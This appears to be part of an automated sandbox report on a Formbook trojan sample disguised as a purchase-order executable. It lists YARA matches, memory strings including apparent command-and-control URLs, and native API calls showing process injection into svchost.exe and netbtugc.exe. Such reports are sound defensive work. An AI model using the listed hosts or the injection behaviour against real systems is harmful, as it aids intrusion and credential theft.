            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:37 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: fALrZoEgBHis.exe, 00000006.00000002.2709976615.0000000005433000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kexweb.top
            Source: fALrZoEgBHis.exe, 00000006.00000002.2709976615.0000000005433000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kexweb.top/3bdq/
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000005.00000003.1954629588.0000000008575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000005.00000002.2710234659.0000000004778000.00000004.10000000.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.00000000036A8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003C2D8000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryY
            Source: netbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.gandi.net/en/domain
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: PO# Q919240.exe
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C063 NtClose | 2_2_0042C063
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B60 NtClose, LdrInitializeThunk | 2_2_03972B60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DF0 NtQuerySystemInformation, LdrInitializeThunk | 2_2_03972DF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C70 NtFreeVirtualMemory, LdrInitializeThunk | 2_2_03972C70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039735C0 NtCreateMutant, LdrInitializeThunk | 2_2_039735C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974340 NtSetContextThread | 2_2_03974340
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974650 NtSuspendThread | 2_2_03974650
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B80 NtQueryInformationFile | 2_2_03972B80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BA0 NtEnumerateValueKey | 2_2_03972BA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BF0 NtAllocateVirtualMemory | 2_2_03972BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BE0 NtQueryValueKey | 2_2_03972BE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AB0 NtWaitForSingleObject | 2_2_03972AB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AD0 NtReadFile | 2_2_03972AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AF0 NtWriteFile | 2_2_03972AF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F90 NtProtectVirtualMemory | 2_2_03972F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FB0 NtResumeThread | 2_2_03972FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FA0 NtQuerySection | 2_2_03972FA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FE0 NtCreateFile | 2_2_03972FE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F30 NtCreateSection | 2_2_03972F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F60 NtCreateProcessEx | 2_2_03972F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E80 NtReadVirtualMemory | 2_2_03972E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EA0 NtAdjustPrivilegesToken | 2_2_03972EA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EE0 NtQueueApcThread | 2_2_03972EE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E30 NtWriteVirtualMemory | 2_2_03972E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DB0 NtEnumerateKey | 2_2_03972DB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DD0 NtDelayExecution | 2_2_03972DD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D10 NtMapViewOfSection | 2_2_03972D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D00 NtSetInformationFile | 2_2_03972D00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D30 NtUnmapViewOfSection | 2_2_03972D30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CA0 NtQueryInformationToken | 2_2_03972CA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CC0 NtQueryVirtualMemory | 2_2_03972CC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CF0 NtOpenProcess | 2_2_03972CF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C00 NtQueryInformationProcess | 2_2_03972C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C60 NtCreateKey | 2_2_03972C60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973090 NtSetValueKey | 2_2_03973090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973010 NtOpenDirectoryObject | 2_2_03973010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039739B0 NtGetContextThread | 2_2_039739B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D10 NtOpenProcessToken | 2_2_03973D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D70 NtOpenThread | 2_2_03973D70
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB4340 NtSetContextThread, LdrInitializeThunk | 5_2_03AB4340
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB4650 NtSuspendThread, LdrInitializeThunk | 5_2_03AB4650
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2BA0 NtEnumerateValueKey, LdrInitializeThunk | 5_2_03AB2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2BE0 NtQueryValueKey, LdrInitializeThunk | 5_2_03AB2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2BF0 NtAllocateVirtualMemory, LdrInitializeThunk | 5_2_03AB2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2B60 NtClose, LdrInitializeThunk | 5_2_03AB2B60
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2AF0 NtWriteFile, LdrInitializeThunk | 5_2_03AB2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2AD0 NtReadFile, LdrInitializeThunk | 5_2_03AB2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2FB0 NtResumeThread, LdrInitializeThunk | 5_2_03AB2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2FE0 NtCreateFile, LdrInitializeThunk | 5_2_03AB2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2F30 NtCreateSection, LdrInitializeThunk | 5_2_03AB2F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2E80 NtReadVirtualMemory, LdrInitializeThunk | 5_2_03AB2E80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2EE0 NtQueueApcThread, LdrInitializeThunk | 5_2_03AB2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2DF0 NtQuerySystemInformation, LdrInitializeThunk | 5_2_03AB2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2DD0 NtDelayExecution, LdrInitializeThunk | 5_2_03AB2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2D30 NtUnmapViewOfSection, LdrInitializeThunk | 5_2_03AB2D30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2D10 NtMapViewOfSection, LdrInitializeThunk | 5_2_03AB2D10
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2CA0 NtQueryInformationToken, LdrInitializeThunk | 5_2_03AB2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2C60 NtCreateKey, LdrInitializeThunk | 5_2_03AB2C60
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2C70 NtFreeVirtualMemory, LdrInitializeThunk | 5_2_03AB2C70
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB35C0 NtCreateMutant, LdrInitializeThunk | 5_2_03AB35C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB39B0 NtGetContextThread, LdrInitializeThunk | 5_2_03AB39B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2B80 NtQueryInformationFile | 5_2_03AB2B80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2AB0 NtWaitForSingleObject | 5_2_03AB2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2FA0 NtQuerySection | 5_2_03AB2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2F90 NtProtectVirtualMemory | 5_2_03AB2F90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2F60 NtCreateProcessEx | 5_2_03AB2F60
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2EA0 NtAdjustPrivilegesToken | 5_2_03AB2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2E30 NtWriteVirtualMemory | 5_2_03AB2E30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2DB0 NtEnumerateKey | 5_2_03AB2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2D00 NtSetInformationFile | 5_2_03AB2D00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2CF0 NtOpenProcess | 5_2_03AB2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2CC0 NtQueryVirtualMemory | 5_2_03AB2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB2C00 NtQueryInformationProcess | 5_2_03AB2C00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB3090 NtSetValueKey | 5_2_03AB3090
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB3010 NtOpenDirectoryObject | 5_2_03AB3010
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB3D10 NtOpenProcessToken | 5_2_03AB3D10
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03AB3D70 NtOpenThread | 5_2_03AB3D70
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03318F50 NtDeleteFile | 5_2_03318F50
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03318E60 NtReadFile | 5_2_03318E60
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03318CF0 NtCreateFile | 5_2_03318CF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03319160 NtAllocateVirtualMemory | 5_2_03319160
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03319000 NtClose | 5_2_03319000
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00431BE8: GetFullPathNameW, __swprintf, _wcslen, CreateDirectoryW, CreateFileW, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle | 0_2_00431BE8
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00446313 DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, _wcsncpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock | 0_2_00446313
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004333BE GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState, SetSystemPowerState | 0_2_004333BE
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0042200C | 0_2_0042200C
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0041A217 | 0_2_0041A217
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00412216 | 0_2_00412216
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0042435D | 0_2_0042435D
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004033C0 | 0_2_004033C0
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044F430 | 0_2_0044F430
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004125E8 | 0_2_004125E8
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044663B | 0_2_0044663B
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004096A0 | 0_2_004096A0
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00413801 | 0_2_00413801
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0042096F | 0_2_0042096F
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004129D0 | 0_2_004129D0
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004119E3 | 0_2_004119E3
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0041C9AE | 0_2_0041C9AE
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0047EA6F | 0_2_0047EA6F
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0040FA10 | 0_2_0040FA10
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044EB5F | 0_2_0044EB5F
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00423C81 | 0_2_00423C81
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00411E78 | 0_2_00411E78
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00442E0C | 0_2_00442E0C
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00420EC0 | 0_2_00420EC0
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044CF17 | 0_2_0044CF17
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00444FD2 | 0_2_00444FD2
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_04265670 | 0_2_04265670
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418113 | 2_2_00418113
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9C3 | 2_2_0040F9C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9BC | 2_2_0040F9BC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402209 | 2_2_00402209
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402210 | 2_2_00402210
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004162FE | 2_2_004162FE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004162BC | 2_2_004162BC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416303 | 2_2_00416303
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FBE3 | 2_2_0040FBE3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DC63 | 2_2_0040DC63
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402DC0 | 2_2_00402DC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042E653 | 2_2_0042E653
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A003E6 | 2_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 | 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 | 2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C02C0 | 2_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 | 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A001AA | 2_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F41A2 | 2_2_039F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F81CC | 2_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DA118 | 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930100 | 2_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C8158 | 2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D2000 | 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393C7C0 | 2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03964750 | 2_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 | 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395C6E0 | 2_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A00591 | 2_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940535 | 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EE4F6 | 2_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4420 | 2_2_039E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F2446 | 2_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F6BD7 | 2_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FAB40 | 2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 | 2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0A9A6 | 2_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 | 2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962 | 2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039268B8 | 2_2_039268B8
